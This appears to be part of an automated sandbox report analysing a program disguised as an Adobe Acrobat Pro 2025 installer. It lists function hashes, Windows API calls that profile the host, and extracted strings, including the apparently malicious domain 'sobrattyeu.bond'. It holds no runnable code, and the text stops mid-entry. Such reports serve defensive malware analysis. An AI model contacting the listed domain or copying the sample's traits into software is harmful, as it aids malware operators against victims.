Instruction ID: 29e22d03b5f687ce5b44e754747a53672c01661638b54936a434c4c680902442
Opcode Fuzzy Hash: 5703d509ee64a993b938a3a05769140ebe37c5336f6eb0dfea2804d93bfa396e
Instruction Fuzzy Hash: EE81D0B5908741CFC7108F28C8917EBB7E1AFD9314F184A6EE49987391E338D845CB8A

Function 0043F280 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044258D,?,00000018,?,?,00000018,?,?,?), ref: 0043F2AE

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0042E9C5 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

/;, xrefs: 0042EB3C

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: /;
API String ID: 0-976513269
Opcode ID: 4fb3e8bf39d8b50b145849e73c8eddecc7cd87d1a5196dd636ae703ad324b6b4
Instruction ID: 0403298f480c046020e3ceb971b8342a09f6c2ae85cce4576fa98bf123d6381a
Opcode Fuzzy Hash: 4fb3e8bf39d8b50b145849e73c8eddecc7cd87d1a5196dd636ae703ad324b6b4
Instruction Fuzzy Hash: D45136316057518BD725CF39D4D0162BB92FFAA36476C8A9EC0D64B7C2C73AA807C749

Function 00441570 Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53d0b936073940bea1b693efc926035509f6014e22ca09bd7ea33fb7d21999eb
Instruction ID: e4a958eb54302c2601c1c76ab41bfd083e426f192494ef53ed26140f7b196ba2
Opcode Fuzzy Hash: 53d0b936073940bea1b693efc926035509f6014e22ca09bd7ea33fb7d21999eb
Instruction Fuzzy Hash: 71A15B75A053114BE718DF28C89066BB7E2EFC9360F0A863DE8D58B3A1D7349C418796

Function 00441F40 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e14b700232707cea18ef2c6b56d1dbc2bb2caa0c18629bcdbd1278ff5ca55df
Instruction ID: 9390ae3e8d261e75c0468991321f330f1ac09d9ddda05c934c5816e73c0fe0c9
Opcode Fuzzy Hash: 9e14b700232707cea18ef2c6b56d1dbc2bb2caa0c18629bcdbd1278ff5ca55df
Instruction Fuzzy Hash: D1A14676B047114BE314CF28DC8066BB7E2EBC9320F19862DE995C7395DB78DC068786

Function 004277C0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6427d36bd27768276afcee80ba9d13f6bba3a1b6471c699e0196e085591dd5f
Instruction ID: 42d542318451b88a9732f72ada64773e8088dac6c660238afeef25f1f0b88cbf
Opcode Fuzzy Hash: e6427d36bd27768276afcee80ba9d13f6bba3a1b6471c699e0196e085591dd5f
Instruction Fuzzy Hash: 91816EB1B083205BE7149B25ECC267BB3D5EF86324F98853EE49597381E27C9D06C35A

Function 0041AC58 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 215f3f2c6c77b3cfac6a1b1800387f9d49f985ba0f6835e4b158afd5b0ef7449
Instruction ID: cebed2bfcb406da84230c2ea38718d1bc5964b2af195abe36bb678a1daed9cb6
Opcode Fuzzy Hash: 215f3f2c6c77b3cfac6a1b1800387f9d49f985ba0f6835e4b158afd5b0ef7449
Instruction Fuzzy Hash: FF71C0B665C3509FE304DF6988415AFBBE2AFD1254F09892DF4D487342D639CA098B8B

Function 004343BB Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb895a79e5d6d904a6b927cfe9cdfcae66a9965584331cd1b4a52a6d56a5dbd
Instruction ID: a202d4a23e98f669f565700f071043582a1f20cbbdc39fb04f80f3c6dd943475
Opcode Fuzzy Hash: eeb895a79e5d6d904a6b927cfe9cdfcae66a9965584331cd1b4a52a6d56a5dbd
Instruction Fuzzy Hash: 92A13D31608B818FD325CF3CC858B16BBE16B56224F09879CD1FA8B3E2D679E505C756

Function 0043DA20 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03d542900a38bec3dd27f8aaf16acd681a819c9820230b9d80146869594cd4b
Instruction ID: 5f96c791f059c0f336b09a0a906a87ae769f4663822fb58e1f9a1a280622a595
Opcode Fuzzy Hash: b03d542900a38bec3dd27f8aaf16acd681a819c9820230b9d80146869594cd4b
Instruction Fuzzy Hash: 59416E74E083009BDB209F18A840B27F3E4AB4D324F26967EEC96973D1D234AC11C789

Function 0043A530 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b65b48ece73a14faa4e6fcd75f6b330b5c2dd48ae626eff8ee96901dfef8b8
Instruction ID: 563bd07f91f712d9eeb8851da01becbd9d7a4a0dab968ad0bd5e9916c70d4371
Opcode Fuzzy Hash: c1b65b48ece73a14faa4e6fcd75f6b330b5c2dd48ae626eff8ee96901dfef8b8
Instruction Fuzzy Hash: 196128766893018FD3108B28C58536BBBE2ABC9324F2A962FD4D5473D1D37DC8918B4B

Function 0042CD69 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0c20652ebbad9c6891aa3547784ae110943de6727211f3a810e1f038658455
Instruction ID: 13a8bbd6736138448c2ef550eb17fd5ecc3c6faf5d933988c2609720f297d5a4
Opcode Fuzzy Hash: 3f0c20652ebbad9c6891aa3547784ae110943de6727211f3a810e1f038658455
Instruction Fuzzy Hash: CE514B217047228BD7288A28D4E137BBB93EFA1314BA9853EC197477D1C638B405C389

Function 0042D9BD Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d87e5175ac49c11d5c76c93162f9d7be37012fb49d9ff29e48a754440f83e4f
Instruction ID: ca7d8fde4cc9d94a430c6cf043b4bfb0d1b178f0d6c87facf414d176e93c4527
Opcode Fuzzy Hash: 1d87e5175ac49c11d5c76c93162f9d7be37012fb49d9ff29e48a754440f83e4f
Instruction Fuzzy Hash: C9312775B057518FD7288F2AD880732FBA3BB9A300F2CC69DD5D24B386C67568028718

Function 0043F02C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e43fb1c7ac4da8462a413695ec0057327ddc16e5a18a05866665f9b427e2d94
Instruction ID: d871941c3347db891b80d40afd2632d6084b4771c59c3854cd3edfd3f6755339
Opcode Fuzzy Hash: 2e43fb1c7ac4da8462a413695ec0057327ddc16e5a18a05866665f9b427e2d94
Instruction Fuzzy Hash: 7011297AF616114BEB1CCF28DD923123666A786301B0EE07DC805EF65DD978C8018B44

Function 0043F5FD Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 644bdceb71bf53f6298eb2c2578d68a270408a4519f321318d7db74611a34840
Instruction ID: d4212815195c473eff151d9d0f61267880e0a266141a4ac9f1559957a0f02020
Opcode Fuzzy Hash: 644bdceb71bf53f6298eb2c2578d68a270408a4519f321318d7db74611a34840
Instruction Fuzzy Hash: 87F0F6B4F495029FDB08CF54ECE0932B362EB8E308F64A539D116473A5E6386C16D608

Function 0043F4F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043F948

Strings

0`z-z, xrefs: 0043F965
[RSP, xrefs: 0043F535

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ForegroundWindow
String ID: [RSP$0`z-z
API String ID: 2020703349-2395477033
Opcode ID: 22d97426b80382f9ecb772462409b4a57568d805a64223f0c4817ed9c7debe3b
Instruction ID: 026d1f8150925cac940b9b4c4299f9967c98de8d574de2bcd84ce3f6d220a8ce
Opcode Fuzzy Hash: 22d97426b80382f9ecb772462409b4a57568d805a64223f0c4817ed9c7debe3b
Instruction Fuzzy Hash: 070126BFF455019BC708AB28D81136A76E397CA304F2D997DE157C3715EA3C95034705

Function 0042E5F5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042E6F0

Strings

WZ^U, xrefs: 0042E679

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ComputerName
String ID: WZ^U
API String ID: 3545744682-697079488
Opcode ID: c893dba88ae688975151d4b0316ac01d0ccd3586e18dd0fc01632afcefe02ad1
Instruction ID: 7f883a6889789a102bfd2049f0ac326a6b57c1641b1a96bddc7b4d93a8493b6b
Opcode Fuzzy Hash: c893dba88ae688975151d4b0316ac01d0ccd3586e18dd0fc01632afcefe02ad1
Instruction Fuzzy Hash: 6E31C5743047408FDB198F29C8D1766BBE2EF6A300F48C09DD5968F75BD6799806CB24

Function 0043F380 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043F948

Strings

0`z-z, xrefs: 0043F965

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: ForegroundWindow
String ID: 0`z-z
API String ID: 2020703349-4106117466
Opcode ID: 760d2d3deb435b5a3899b29ae94bd27071e55ae4be7b8204e778f928bd76f452
Instruction ID: 26dd91e91569996f1a1ca699aefa9b22e0ebec70e43c25102e1b12b03d997b1d
Opcode Fuzzy Hash: 760d2d3deb435b5a3899b29ae94bd27071e55ae4be7b8204e778f928bd76f452
Instruction Fuzzy Hash: 2EE06DFAA510119B9708CF24FC525A633A2ABCA308729547FD40797651CB38A9079B1A

Function 0043F220 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B453,00000000,00000001), ref: 0043F252

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ac504b2c0741c4675dc920aac49256cecd8c850b4eee00ae7e3106f6d5a19a98
Instruction ID: 9dff439e055b0909be9fc35d5e93330e58bb33b532d6d0fefff38058e5f081ca
Opcode Fuzzy Hash: ac504b2c0741c4675dc920aac49256cecd8c850b4eee00ae7e3106f6d5a19a98
Instruction Fuzzy Hash: 3CE02BB6914651EBD7115B347C05B173768FFCA710F020476F40452162DB39E815919E

Function 004305BB Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00430609

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: bb7cae74fbfdce15dd43dc342f654358ec87ffe2d3ea7acd04041d5180b6c4f8
Instruction ID: 06467d000b92d279b342f933077074547a3ae66e7d3263d3415612b6836ac160
Opcode Fuzzy Hash: bb7cae74fbfdce15dd43dc342f654358ec87ffe2d3ea7acd04041d5180b6c4f8
Instruction Fuzzy Hash: AFF0D0B4508701CFD314DF24C1A471A7BF0FB85304F01895CE5958B391CB75A948CF81

Function 00434231 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434279

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 47c7f0f702cf221cbdc69d65e59beacf08a939942fbd94fbd8caba4be198f99e
Instruction ID: a280961ad4f66b33a28033473ef6e4fffa1dde6e438c8f801d0ee0dde80e11af
Opcode Fuzzy Hash: 47c7f0f702cf221cbdc69d65e59beacf08a939942fbd94fbd8caba4be198f99e
Instruction Fuzzy Hash: 00F0D4B41097418FE305CF21C9A831BBFF1EBC9718F15895CD0944B295C7B5964E8F86

Function 00438695 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 004386B3

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 90fd4340605ab0caf0bf526df40a4ebbf4e24dbd26cbd73750bf131078098778
Instruction ID: 3fd96373c78d90f965b77d4e01ce06339cd2389af71fbcc84b437b5ae967eca0
Opcode Fuzzy Hash: 90fd4340605ab0caf0bf526df40a4ebbf4e24dbd26cbd73750bf131078098778
Instruction Fuzzy Hash: 49E01A78918204CFD704EF68D996A997BF0EF4D304F41459ED059EB315DB30AA54CF26

Function 0040C7C3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C7D5

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: ec4c31d6555915c8c39bd67372afb022595dad8213b3dd7b71224dfe693910d4
Instruction ID: 253ecf739c0f940ff5048697afa036148e630de6180f8f93ee5a3113584c83a7
Opcode Fuzzy Hash: ec4c31d6555915c8c39bd67372afb022595dad8213b3dd7b71224dfe693910d4
Instruction Fuzzy Hash: 06D0C9393C83917BF9258B08BC53F1432119346F21F350628B362FE2D1C9D0B111860D

Function 0040C790 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C7A3

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ca515bbc586ace58d66ac61f05e5db99374256372f6dfd73ea5749cdb32c6e62
Instruction ID: a1a5a3aaf160e0190da3079a8014f7c19acc84fd49e81816caa0d4d699deee7e
Opcode Fuzzy Hash: ca515bbc586ace58d66ac61f05e5db99374256372f6dfd73ea5749cdb32c6e62
Instruction Fuzzy Hash: 7DD0A7341649846BE200675CEC47F12375CC747755F480239F2A2DA5D2DD507910C669

Function 0043D9F0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043F26B,?,0040B453,00000000,00000001), ref: 0043DA0E

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b52b8378e3b3735c906b0b9a00edc81fc8c087335d8e7e7862e6b25553c354a3
Instruction ID: f04bbf2b4c98b56e953e29d708f7b6e8678e205c766da3bdfafd52c95168221a
Opcode Fuzzy Hash: b52b8378e3b3735c906b0b9a00edc81fc8c087335d8e7e7862e6b25553c354a3
Instruction Fuzzy Hash: ADD012F1515122FBD6151F14FC06B973B54EF4A321F030466B5006B171C674DC60D6D8

Function 0043D9D0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,7C7F9E81,?,0040873F,7C7F9E81), ref: 0043D9E0

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce2b12d06cce50d15db992f16f41bf58e2f0132629c7a361e5a3b0509d0fd4f6
Instruction ID: 08cc86b28cd57bdcc76a3499b1ee44bda1d1bce30042fd73ca47cb783c57c3ee
Opcode Fuzzy Hash: ce2b12d06cce50d15db992f16f41bf58e2f0132629c7a361e5a3b0509d0fd4f6
Instruction Fuzzy Hash: F6C09B71145120BBD5502B15FC05FC77F58DF45355F114056B14467173C770AC51C6D8

Non-executed Functions

Function 0042294C Relevance: 86.7, Strings: 69, Instructions: 431COMMON

Download Yara Rule

Strings

S, xrefs: 00422A54
c, xrefs: 00422AED
H, xrefs: 00422EFD
n, xrefs: 00422AB1
A, xrefs: 004229DD
0915015DAA6168FC82571D99A8EB0A98, xrefs: 00422CE5
], xrefs: 00422A9A
-, xrefs: 00422AC9
z, xrefs: 00422AD5
c, xrefs: 00422ADD
W, xrefs: 004229F2
{, xrefs: 00422ACD
M, xrefs: 00422AA5
K, xrefs: 00422B53
O, xrefs: 00422B67
^, xrefs: 00422A5B
b, xrefs: 00422BDB
N, xrefs: 00422EB7
[, xrefs: 00422A2A
-, xrefs: 00422A4D
a, xrefs: 00422AB5
b, xrefs: 00422ABD
?, xrefs: 00422E55
), xrefs: 00423061
k, xrefs: 00422AC5
`, xrefs: 00422AE1
<, xrefs: 00422E71
Y, xrefs: 00422F6D
C, xrefs: 00422A46
-, xrefs: 00422E0F
C, xrefs: 00422A3F
N, xrefs: 00422A38
/, xrefs: 00422E01
Y, xrefs: 00422AA1
M, xrefs: 00422A07
j, xrefs: 00423071
sobrattyeu.bond, xrefs: 0042311A
W, xrefs: 00422A00
q, xrefs: 00422AF1
C, xrefs: 004229D6
1, xrefs: 00422E9B
S, xrefs: 004229E4
w, xrefs: 00422AC1
X, xrefs: 00422A15
?, xrefs: 00422E7F
V, xrefs: 00422A62
`, xrefs: 00422AE9
P, xrefs: 00422A70
[, xrefs: 00422F51
I, xrefs: 00422A77
?, xrefs: 004229CF
J, xrefs: 00422ED3
R, xrefs: 00422F19
^, xrefs: 00422F35
_, xrefs: 00422F43
\, xrefs: 00422BE3
H, xrefs: 00422EC5
M, xrefs: 00422A31
[, xrefs: 00422BD3
4, xrefs: 00422BE7
^, xrefs: 00422BDF
9, xrefs: 004229F9
/, xrefs: 00422E1D
b, xrefs: 00422AE5
q, xrefs: 00422AF5
O, xrefs: 00422A23
G, xrefs: 00422F0B
J, xrefs: 00422A0E
d, xrefs: 00422F89

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: )$-$-$-$/$/$0915015DAA6168FC82571D99A8EB0A98$1$4$9$<$?$?$?$A$C$C$C$G$H$H$I$J$J$K$M$M$M$N$N$O$O$P$R$S$S$V$W$W$X$Y$Y$[$[$[$\$]$^$^$^$_$`$`$a$b$b$b$c$c$d$j$k$n$q$q$sobrattyeu.bond$w$z${
API String ID: 0-113800042
Opcode ID: 6e0bc989668a98740777f3de2bbf949620b16a04d1d49df6bb3800b52e0d183c
Instruction ID: b8209996f5cc74d9dbdc7b087c924c468767f2150c42ec0f5d266881296e92eb
Opcode Fuzzy Hash: 6e0bc989668a98740777f3de2bbf949620b16a04d1d49df6bb3800b52e0d183c
Instruction Fuzzy Hash: E2324421908BEA89DB32C67C4C187DDBE611B63224F0843DDD4F96B3D2C7750A86CB66

Function 00437D7D Relevance: 82.9, Strings: 66, Instructions: 386COMMON

Download Yara Rule

Strings

c, xrefs: 00437F35
A, xrefs: 00437E8C
G, xrefs: 00437EB6
p, xrefs: 0043811E
@, xrefs: 00437E31
d, xrefs: 00437EA1
Q, xrefs: 00437D97
[, xrefs: 00437DC1
M, xrefs: 00437DEB
], xrefs: 00437EDD
S, xrefs: 00437EF5
e, xrefs: 00437F3D
0, xrefs: 00437FE9
+, xrefs: 00438015
_, xrefs: 00438136
k, xrefs: 00437F15
Y, xrefs: 00437EC4
S, xrefs: 00437DCF
i, xrefs: 00437F0D
[, xrefs: 00437ED2
a, xrefs: 00437F2D
], xrefs: 00437DF9
E, xrefs: 00437EA8
I, xrefs: 00437E3F
/, xrefs: 00438025
#, xrefs: 00438035
g, xrefs: 00437F45
U, xrefs: 00437EFD
o, xrefs: 00437F25
Q, xrefs: 00437EED
w, xrefs: 00437F85
{, xrefs: 00437F55
M, xrefs: 00437E70
+, xrefs: 00437DB3
&, xrefs: 00437FC1
#, xrefs: 00438146
I, xrefs: 00437E54
!, xrefs: 0043802D
), xrefs: 0043800D
@, xrefs: 00437E07
D, xrefs: 00437F39
V, xrefs: 00437F81
h, xrefs: 00437E4D
u, xrefs: 00437F7D
C, xrefs: 00437E9A
_, xrefs: 00437EE5
q, xrefs: 00437F6D
}, xrefs: 00437F5D
L, xrefs: 00437F01
K, xrefs: 00437E62
O, xrefs: 00437E7E
-, xrefs: 0043801D
Q67d, xrefs: 0043823F
P, xrefs: 00437F69
Y, xrefs: 0043812E
W, xrefs: 00437F05
4, xrefs: 0043820E
h, xrefs: 00437D89
D, xrefs: 00437E15
h, xrefs: 00438126
s, xrefs: 00437F75
y, xrefs: 00437F4D
", xrefs: 00438031
P, xrefs: 00437F09
m, xrefs: 00437F1D
`, xrefs: 00437E85

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: !$"$#$#$&$)$+$+$-$/$0$4$@$@$A$C$D$D$E$G$I$I$K$L$M$M$O$P$P$Q$Q$Q67d$S$S$U$V$W$Y$Y$[$[$]$]$_$_$`$a$c$d$e$g$h$h$h$i$k$m$o$p$q$s$u$w$y${$}
API String ID: 0-2942958629
Opcode ID: f79405463cf1d34af6231f347c90fa98bee482a6cf81a1348d0f5875d2aa4738
Instruction ID: d60f33de14ade5b468a88900df3324c031b22d8d504c61a49675df103ba387d1
Opcode Fuzzy Hash: f79405463cf1d34af6231f347c90fa98bee482a6cf81a1348d0f5875d2aa4738
Instruction Fuzzy Hash: 541263219087D989DB22C67C88483CEBFA11B57324F1843D9D5E96B3D2C7790A45CB66

Function 004394F4 Relevance: 82.9, Strings: 66, Instructions: 379COMMON

Download Yara Rule

Strings

O, xrefs: 004395F5
@, xrefs: 004395A8
_, xrefs: 0043965C
w, xrefs: 004396FC
h, xrefs: 00439500
#, xrefs: 004397AC
I, xrefs: 004395CB
], xrefs: 00439654
i, xrefs: 00439684
-, xrefs: 00439794
!, xrefs: 004397A4
M, xrefs: 004395E7
k, xrefs: 0043968C
0, xrefs: 00439760
+, xrefs: 0043952A
d, xrefs: 00439618
P, xrefs: 004396E0
V, xrefs: 004396F8
h, xrefs: 0043989D
s, xrefs: 004396EC
{, xrefs: 004396CC
/, xrefs: 0043979C
&, xrefs: 00439738
D, xrefs: 004396B0
Q, xrefs: 0043950E
m, xrefs: 00439694
I, xrefs: 004395B6
W, xrefs: 0043967C
a, xrefs: 004396A4
M, xrefs: 00439562
u, xrefs: 004396F4
@, xrefs: 0043957E
#, xrefs: 004398BD
[, xrefs: 00439538
E, xrefs: 0043961F
Y, xrefs: 004398A5
D, xrefs: 0043958C
o, xrefs: 0043969C
}, xrefs: 004396D4
S, xrefs: 00439546
_, xrefs: 004398AD
], xrefs: 00439570
Y, xrefs: 0043963B
), xrefs: 00439784
G, xrefs: 0043962D
Q67d, xrefs: 004399B6
Q, xrefs: 00439664
C, xrefs: 00439611
g, xrefs: 004396BC
P, xrefs: 00439680
`, xrefs: 004395FC
4, xrefs: 00439985
y, xrefs: 004396C4
p, xrefs: 00439895
L, xrefs: 00439678
q, xrefs: 004396E4
K, xrefs: 004395D9
U, xrefs: 00439674
", xrefs: 004397A8
A, xrefs: 00439603
[, xrefs: 00439649
h, xrefs: 004395C4
+, xrefs: 0043978C
e, xrefs: 004396B4
c, xrefs: 004396AC
S, xrefs: 0043966C

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

